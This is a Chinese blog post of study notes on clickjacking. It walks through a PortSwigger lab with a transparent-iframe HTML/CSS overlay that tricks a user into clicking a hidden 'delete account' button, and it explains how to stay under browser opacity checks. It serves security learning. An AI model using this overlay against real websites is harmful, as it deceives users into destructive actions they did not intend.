首页 > 其他分享 >BP - 点击劫持 Clickjacking (UI redressing)

BP - 点击劫持 Clickjacking (UI redressing)

时间:2024-10-02 22:23:09浏览次数:8  
标签:opacity Clickjacking 帐户 单击 value 点击 BP iframe UI

What is clickjacking?

点击劫持是一种基于界面的攻击,通过点击诱饵网站中的其他内容,诱骗用户点击隐藏网站上的可操作内容。

iframe

基于会话的 CSRF 令牌无法缓解点击劫持攻击,因为目标会话是通过从真实网站加载的内容建立的,并且所有请求都在域内发生。CSRF 令牌被放入请求中,并作为正常会话的一部分传递给服务器。与普通用户会话相比,不同之处在于该过程发生在隐藏的 iframe 中。

如何构建基本的点击劫持攻击

CSS:<style> z-index覆盖顺序 opacity不透明度;
iframe
浏览器透明阈值检测(opacity是否不为0或者小于0.1等):浏览器点击劫持保护可能会应用基于阈值的 iframe 透明度检测(例如,Chrome 版本 76 包含此行为,但 Firefox 不包含)。攻击者选择不透明度值,以便在不触发保护行为的情况下实现所需效果。

  • 透明实验的代码
<head>
	<style>
		#target_website {
			position:relative;
			width:128px;
			height:128px;
			opacity:0.00001;
			z-index:2;
			}
		#decoy_website {
			position:absolute;
			width:300px;
			height:400px;
			z-index:1;
			}
	</style>
</head>
...
<body>
	<div id="decoy_website">
	...decoy web content here...
	</div>
	<iframe id="target_website" src="https://vulnerable-website.com">
	</iframe>
</body>

Lab: Basic clickjacking with CSRF token protection 基于 CSRF 令牌保护的基本点击劫持

如果这个实验在有参考资料(基于王垠的心法,尽量不要找没有参考的目标且没有教育价值的东西)都无法看懂,说明两点:1.英语阅读极其垃圾;2.基础差到趋近于0。你要好好反思自己的基础,及时弥补还来得及(最好是穿越到古代,其次是当下)。

至于介词不介词的语法不重要,目的是看懂整句话表达的什么意思。作用于 Basic clickjacking上面: with CSRF token protection

此实验包含登录功能和受 CSRF 令牌保护的删除帐户按钮。用户将点击诱饵网站上显示“点击”字样的元素。
要解决此实验,请编写一些 HTML 来构建帐户页面并欺骗用户删除其帐户。删除帐户后,此实验即告解决。
您可以使用以下凭据登录自己的帐户:wiener:peter

登录目标网站上的帐户。
转到漏洞利用服务器并将以下 HTML 模板粘贴到 Body 部分:

<style>
    iframe {
        position:relative;
        width:$width_value;
        height: $height_value;
        opacity: $opacity;
        z-index: 2;
    }
    div {
        position:absolute;
        top:$top_value;
        left:$side_value;
        z-index: 1;
    }
</style>
<div>Test me</div>
<iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>

对模板进行以下调整:
将 iframe src 属性中的 YOUR-LAB-ID 替换为您的唯一实验室 ID。
将 iframe 的 $height_value 和 $width_value 变量替换为合适的像素值(我们建议分别为 700px 和 500px)。
将诱饵网页内容的 $top_value 和 $side_value 变量替换为合适的像素值,以便“删除帐户”按钮和“测试我”诱饵操作对齐(我们建议分别为 300px 和 60px)。
设置不透明度值 $opacity 以确保目标 iframe 是透明的。最初,使用 0.1 的不透明度,以便您可以对齐 iframe 操作并根据需要调整位置值。对于提交的攻击,0.0001 的值将起作用。
单击“存储”,然后单击“查看漏洞利用”。
将鼠标悬停在“测试我”上,确保光标变为手形,表示 div 元素的位置正确。请勿亲自单击“删除帐户”按钮。如果这样做,实验室将被破坏,您需要等到它重置后才能重试(大约 20 分钟)。如果 div 排列不正确,请调整样式表的顶部和左侧属性。
将 div 元素正确排列后,将“测试我”更改为“Click me 单击我”,然后单击“存储”。
单击“将漏洞利用传递给受害者”,实验室应该就解决了。

标签:opacity,Clickjacking,帐户,单击,value,点击,BP,iframe,UI
From: https://www.cnblogs.com/sec875/p/18445189

相关文章

  • quine注入
    SQLiquinequine基本形式——它是可以执行的,对str进行的操作REPLACE(REPLACE('str',CHAR(34),CHAR(39)),编码的间隔符,'str')str基本形式——被上式执行——将str中的间隔符换成自己,相当于在quine中的str换成下式,同时双引号改成单引号,使str被quine双replace执行后与quine基本......
  • CF589H Tourist Guide
    昨晚码敲完了没保存,导致还原卡直接把我码肘没了。。。气死了只能重新敲了一遍。题面TouristGuide分析考虑每一个联通块分开处理。先将每一个联通块变为生成树,任意生成方式皆可。对于每一个联通块,一定可以构造一种组合方法,使得该联通块中最多只有一个关键点无法被选择。并......
  • 前端无代码-表单页面的查看和编辑| uiotos致敬amis、appsmith、codewave、goview、dat
    上位机或管理系统,增删改查属于常规操作。其中以点击以查看和编辑,弹出表单页面,最为常见。 UIOTOS支持页面嵌套、属性继承(包括只读属性)。通过配置和连线,也能对表单页面区分查看和编辑,但有些繁琐。可以利用容器组件的表单只读属性,勾选后,连线传入表单数据,将只读显示。 文档地......
  • 前端零代码-技术原理:对话框嵌套和自定义按钮| uiotos致敬amis、appsmith、codewave、g
    对话框有默认标题头和脚,带有默认的取消、确定、关闭等按钮:   对话框编辑状态和运行状态UIOTOS中对话框属常见容器,内容由任意其他页面嵌套而来。如下所示:                                   ......
  • pbootcms增加webp和mov等上传文件类型的方法
    在PBootCMS中,如果需要增加一些非常见的文件格式上传,可以通过修改配置文件来实现这一需求。以下是详细的步骤说明:操作步骤1.修改 config.php 文件打开 config.php 文件:文件位置:/config/config.php修改 upload 配置信息:在大约第30行附近找到 upload 配置......
  • 成功地在 PBootCMS 中增加 .webp 和 .mov 文件类型的上传支持
    config.php 文件修改示例<?phpreturnarray(//其他配置...//上传配置'upload'=>array('format'=>'jpg,jpeg,png,gif,xls,xlsx,doc,docx,ppt,pptx,rar,zip,pdf,txt,mp4,avi,flv,rmvb,mp3,otf,ttf,webp,mov',......
  • Meta:LLM语言概念推理基准Linguini
    ......
  • 基于深度学习的跌倒检测系统:YOLOv5/v6/v7/v8/v10模型实现与UI界面集成、数据集
    1.引言跌倒检测是一个重要的研究领域,尤其在老年人和病人监护中,及时检测并响应跌倒事件可以大大减少伤害和死亡的风险。本博客将介绍如何构建一个基于深度学习的跌倒检测系统,使用YOLOv5进行目标检测,并设计一个用户界面(UI)来实时监控和反馈。本文将详细描述系统的各个组成部分......
  • 【花雕学编程】Arduino动手做(232)---ESP32-S3 CAM使用joystick双轴摇杆模块控制LED灯
    37款传感器与执行器的提法,在网络上广泛流传,其实Arduino能够兼容的传感器模块肯定是不止这37种的。鉴于本人手头积累了一些传感器和执行器模块,依照实践出真知(一定要动手做)的理念,以学习和交流为目的,这里准备逐一动手尝试系列实验,不管成功(程序走通)与否,都会记录下来——小小的......
  • 【花雕学编程】Arduino动手做(232)---ESP32-S3 CAM使用DHT11模块测量温湿度
    37款传感器与执行器的提法,在网络上广泛流传,其实Arduino能够兼容的传感器模块肯定是不止这37种的。鉴于本人手头积累了一些传感器和执行器模块,依照实践出真知(一定要动手做)的理念,以学习和交流为目的,这里准备逐一动手尝试系列实验,不管成功(程序走通)与否,都会记录下来——小小的......